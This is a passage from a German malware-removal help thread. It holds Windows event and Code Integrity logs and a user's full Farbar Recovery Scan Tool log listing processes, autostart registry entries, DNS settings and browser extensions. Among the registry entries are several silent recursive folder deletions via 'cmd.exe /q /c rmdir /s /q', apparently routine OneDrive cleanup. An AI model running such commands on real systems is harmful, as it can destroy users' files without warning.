Description: Der Dienst "Synchronisierungshost_21eb23a" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/28/2016 09:19:51 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (04/28/2016 08:14:54 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NVIDIA Display Driver Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (04/28/2016 08:12:50 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Warten auf eine Transaktionsrückmeldung von Dienst avgsvc erreicht.

Error: (04/28/2016 07:24:01 PM) (Source: TPM) (EventID: 12) (User: )
Description: Beim Gerätetreiber für das Trusted Platform Module (TPM) ist ein Fehler in der TPM-Hardware aufgetreten, der dazu führen kann, dass einige Anwendungen, die TPM-Dienste verwenden, nicht ordnungsgemäß ausgeführt werden. Starten Sie den Computer neu, um die TPM-Hardware zurückzusetzen. Wenn Sie weitere Unterstützung benötigen, wenden Sie sich an den Computerhersteller, um weitere Informationen zu erhalten.


CodeIntegrity:
===================================
  Date: 2016-04-21 14:52:01.628
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-15 19:26:02.941
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-14 19:33:41.498
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-14 17:49:30.555
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-12 12:32:50.135
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-10 20:43:31.743
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-04 16:12:15.167
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-02 18:47:31.445
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-01 22:15:42.536
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-01 13:25:47.753
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
Prozentuale Nutzung des RAM: 34%
Installierter physikalischer RAM: 8097.78 MB
Verfügbarer physikalischer RAM: 5329.75 MB
Summe virtueller Speicher: 10145.78 MB
Verfügbarer virtueller Speicher: 7274.61 MB

==================== Laufwerke ================================

Drive c: (Acer) (Fixed) (Total:118.64 GB) (Free:56.03 GB) NTFS
Drive d: (Data) (Fixed) (Total:931.51 GB) (Free:867.28 GB) NTFS
Drive e: (Need for Speed 1) (CDROM) (Total:7.91 GB) (Free:0 GB) CDFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 119.2 GB) (Disk ID: 5A03D594)

Partition: GPT.

========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 5A03D5FA)

Partition: GPT.

==================== Ende von Addition.txt ============================
         
--- --- ---

Alt 29.04.2016, 19:36   #25
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



das andere FRST Log fehlt
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 29.04.2016, 20:44   #26
Maximilian1
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Hier ist es
FRST Logfile:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-04-2016
durchgeführt von Maximilian (Administrator) auf LAPTOP-6N843D06 (29-04-2016 16:31:46)
Gestartet von C:\Users\Maximilian\Downloads
Geladene Profile: Maximilian (Verfügbare Profile: Maximilian)
Platform: Windows 10 Home Version 1511 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation) C:\Windows\System32\IntelSSTAPO\ParameterService\ParameterService.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Qualcomm Atheros) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe
() C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(IObit) C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
() C:\Program Files\AVAST Software\SecureLine\vpnsvc.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QASvc.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALSvc.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.9.656.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(acer) C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McUICnt.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAgent.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALockHandler.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAdminAgent.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
() C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(© 2015 Microsoft Corporation) C:\Users\Maximilian\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(1und1 Mail und Media GmbH) C:\Program Files (x86)\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(Simply Super Software) C:\Program Files (x86)\Trojan Remover\Trjscan.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
() C:\OEM\Preload\FubTracking\FubTracking.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe
(AVAST Software) C:\Program Files\AVAST Software\SecureLine\secureline.exe
(Farbar) C:\Users\Maximilian\Downloads\FRST64 (2).exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16404224 2015-09-23] (Realtek Semiconductor)
HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [628736 2015-06-16] ()
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2631824 2015-07-14] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [15033976 2015-11-20] (Logitech Inc.)
HKLM-x32\...\Run: [MailCheck IE Broker] => C:\Program Files (x86)\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe [2209856 2015-12-17] (1und1 Mail und Media GmbH)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirnx.exe [186640 2016-04-14] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [TrojanScanner] => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [3753016 2016-02-19] (Simply Super Software)
HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\Run: [BingSvc] => C:\Users\Maximilian\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-12-25] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\RunOnce: [Uninstall C:\Users\Maximilian\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Maximilian\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\RunOnce: [Uninstall C:\Users\Maximilian\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Maximilian\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"
HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\RunOnce: [Uninstall C:\Users\Maximilian\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Maximilian\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\amd64"
HKU\S-1-5-21-1076315954-907306345-2410837627-1001\...\MountPoints2: {393382a2-8183-11e5-9bc6-806e6f6e6963} - "E:\Autorun.exe" 
HKU\S-1-5-21-1076315954-907306345-2410837627-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\PhotoScreensaver.scr [583680 2015-10-30] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-01-19] (Acer Incorporated)
ShellIconOverlayIdentifiers: [ ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-01-19] (Acer Incorporated)
ShellIconOverlayIdentifiers: [ ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-01-19] (Acer Incorporated)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{05becd0a-1f08-4574-a11f-dcbc438c439a}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{34cf8eb3-1466-45c8-8888-050c07fa1b69}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{570d79df-7ac5-4e57-b054-5e734a41a782}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{97b04f45-e598-47a5-a0e3-9857de5fc585}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1076315954-907306345-2410837627-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1076315954-907306345-2410837627-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer15.msn.com/?pc=ACTE
SearchScopes: HKU\S-1-5-21-1076315954-907306345-2410837627-1001 -> DefaultScope {7C98862F-C7E0-40CC-A437-A7B4F80F4EAA} URL = hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q={searchTerms}&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1076315954-907306345-2410837627-1001 -> {4126A83B-B60E-4AD8-84DD-B059C1139A5A} URL = hxxp://go.mail.com/tb/en-us/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-1076315954-907306345-2410837627-1001 -> {532FE9E5-ADC7-458C-A69E-D2A2488E6C1F} URL = hxxp://go.1und1.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-1076315954-907306345-2410837627-1001 -> {6094A534-2B66-4867-8632-41B865B2B51C} URL = hxxp://go.web.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-1076315954-907306345-2410837627-1001 -> {7C98862F-C7E0-40CC-A437-A7B4F80F4EAA} URL = hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q={searchTerms}&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1076315954-907306345-2410837627-1001 -> {805E9521-CBA5-48EE-BD85-AEBCD67921E8} URL = hxxp://go.gmx.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-04-21] (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2016-01-09] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-04-03] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2016-01-09] (Oracle Corporation)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-09-22] (Eyeo GmbH)
BHO-x32: AcroIEHlprObj Class -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files (x86)\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx [2001-04-16] ()
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files (x86)\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-09-22] (Eyeo GmbH)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-04-12] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-04-12] (McAfee, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-04-03] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-04-03] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-04-03] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-04-03] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-04-12] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-04-12] (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
Handler: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler-x32: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files (x86)\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\mcsniepl64.dll [2016-03-31] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-03-31] (McAfee, Inc.)

Edge: 
======
Edge HomeButtonPage: HKU\S-1-5-21-1076315954-907306345-2410837627-1001 -> hxxp://go.web.de/tb/ie_startpage

FireFox:
========
FF ProfilePath: C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default
FF DefaultSearchEngine: Default
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll [2015-12-30] ()
FF Plugin: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2016-01-09] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2016-01-09] (Oracle Corporation)
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\npmcsnffpl64.dll [2016-03-31] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll [2015-12-30] ()
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\npmcsnffpl.dll [2016-03-31] ()
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-04-03] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-29] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2014-11-15] ()
FF Plugin HKU\S-1-5-21-1076315954-907306345-2410837627-1001: @adobe.com/Acrobat,version=5.1 -> C:\Program Files (x86)\Adobe\Acrobat 5.0\Reader\Browser\nppdf32.dll [2002-08-12] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2002-08-12] (Adobe Systems Inc.)
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2016-04-22]
FF Extension: Combo - C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\Extensions\combo@yandex.ru [2016-04-09]
FF Extension: Deutsch (DE) Language Pack - C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\Extensions\langpack-de@firefox.mozilla.org [2015-12-25] [ist nicht signiert]
FF Extension: Bronze Aid - C:\Users\Maximilian\AppData\Roaming\Mozilla\Firefox\Profiles\7oxehink.default\Extensions\{b519cd2c-380e-43aa-ba63-1056ddd690fc}.xpi [2015-12-27] [ist nicht signiert]
FF Extension: Skype - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-04-21] [ist nicht signiert]

Chrome: 
=======
CHR Profile: C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Präsentationen) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-03-14]
CHR Extension: (Google Docs) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-03-14]
CHR Extension: (Google Drive) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-03-14]
CHR Extension: (Fotor Photo Editor) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfbckhhmjfnmedpakkaaflpnmkamdppf [2016-03-15]
CHR Extension: (Adguard Werbeblocker) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgnkhhnnamicmpeenaelnjfhikgbkllg [2016-04-09]
CHR Extension: (YouTube) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-03-14]
